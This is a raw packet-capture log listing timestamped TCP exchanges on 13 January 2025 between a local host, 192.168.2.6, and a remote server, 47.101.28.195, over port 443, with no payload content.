Jan 13, 2025 02:06:41.806580067 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.806592941 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.806627989 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.806915045 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.806976080 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.807909012 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.807962894 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.812372923 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.812452078 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.820947886 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.821048021 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.821080923 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.821146965 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.821181059 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.821237087 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.821280003 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.821356058 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.821374893 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.821432114 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.824028015 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.824094057 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.825095892 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.825161934 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.831047058 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.831127882 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.834021091 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.834103107 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.841876984 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.841948032 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.842935085 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.843029022 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.843641043 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.843703032 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.845468998 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.845535040 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.885638952 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.885720015 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.885771990 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.885833025 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.885875940 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.885937929 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.885979891 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.886044025 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.886113882 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.886176109 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.886311054 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.886368990 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.889761925 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.889827967 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.889892101 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.889952898 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.891395092 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.891458988 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.891485929 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.891551018 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.892216921 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.892282009 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.892337084 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.892406940 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.892715931 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.892781019 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.892824888 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.892888069 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.893131971 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.893202066 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.893223047 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.893285036 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.893918037 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.893995047 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.894006968 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.894037962 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.894068956 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.894164085 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.899189949 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.899257898 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.899281025 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.899342060 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.904788971 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.904855013 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.904880047 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.904939890 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.905250072 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.905312061 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.905456066 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.905523062 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.906279087 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.906342030 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.906410933 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.906478882 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.915361881 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.915441036 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.915460110 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.915493965 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.915528059 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.915556908 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.923341990 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.923427105 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.923438072 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.923463106 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.923497915 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.923520088 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.927154064 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.927212954 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.927249908 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.927402973 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.970693111 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.970746040 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.970762014 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.970789909 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.970822096 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.970841885 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.970973969 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.971041918 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.971061945 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.971077919 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.971106052 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.971132040 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.971776009 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.971853018 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.971920013 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.972013950 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.976574898 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.976639032 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.976670027 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.976738930 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.978241920 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.978317976 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.978338003 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.978419065 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.978962898 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.979038000 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.979068995 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.979125977 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.982275009 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.982337952 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.982393980 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.982459068 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.982492924 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.982563972 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.982594013 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.982666969 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.982696056 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.982762098 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.982781887 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.982848883 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.985734940 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.985837936 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.985899925 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.985986948 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.991621017 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.991681099 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.991746902 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.991815090 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.992078066 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.992141008 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.992165089 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.992229939 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.993124008 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.993196964 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.993223906 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.993284941 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.002432108 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.002494097 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.002522945 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.002589941 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.010122061 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.010200977 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.010202885 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.010226011 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.010262012 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.010302067 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.013868093 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.013937950 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.013977051 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.014033079 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.057809114 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.057852030 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.057873011 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.057879925 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.057912111 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.057992935 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.058047056 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.058048964 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.058058977 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.058098078 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.058110952 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.058646917 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.058690071 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.058697939 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.058706045 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.058737993 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.058753014 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.063292980 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.063349009 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.064913988 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.064961910 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.064965010 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.064973116 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.065012932 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.065656900 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.065705061 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.065779924 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.065824032 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.069000959 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.069053888 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.069366932 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.069400072 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.069416046 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.069425106 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.069442987 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.069451094 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.069463015 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.069466114 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.069490910 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.069518089 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.069586992 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.069636106 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.069637060 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.069654942 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.069679022 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.069694996 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.072738886 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.072797060 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.072823048 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.072881937 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.078531027 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.078591108 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.078622103 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.078681946 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.078723907 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.078788996 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.078938961 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.079003096 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.079943895 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.080015898 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.080086946 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.080142975 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.089198112 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.089260101 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.089288950 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.089349985 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.096968889 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.097026110 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.097058058 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.097117901 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.100725889 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.100784063 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.100836992 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.100893021 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.103809118 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.145118952 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.145174980 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.145206928 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.145230055 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.145256042 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.145271063 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.145296097 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.145299911 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.145318985 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.145344019 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.145369053 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.145369053 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.145519972 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.145559072 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.145587921 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.145597935 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.145623922 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.145643950 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.150129080 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.150191069 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.150243998 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.150302887 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.151772022 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.151809931 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.151819944 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.151829958 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.151846886 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.151870012 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.152539015 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.152590036 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.152618885 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.152669907 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.156151056 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.156182051 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.156197071 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.156205893 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.156224966 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.156230927 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.156239033 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.156241894 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.156272888 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.156280994 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.156290054 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.156306028 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.156327963 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.156443119 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.156493902 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.156533003 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.156583071 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.159656048 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.159687996 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.159704924 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.159713030 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.159737110 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.159758091 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.165467978 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.165524960 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.165647030 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.165699005 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.166311026 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.166373014 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.166433096 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.166526079 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.166696072 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.166749001 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.166887999 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.166935921 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.175789118 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.175854921 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.175884008 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.175935984 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.183805943 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.183875084 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.183916092 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.183974028 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.187527895 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.187596083 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.187616110 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.187668085 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.231863022 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.231919050 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.231983900 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.232062101 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.232110023 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.232206106 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.232207060 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.232248068 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:42.232285023 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.232285023 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:42.232367039 CET	443	49989	47.101.28.195	192.168.2.6
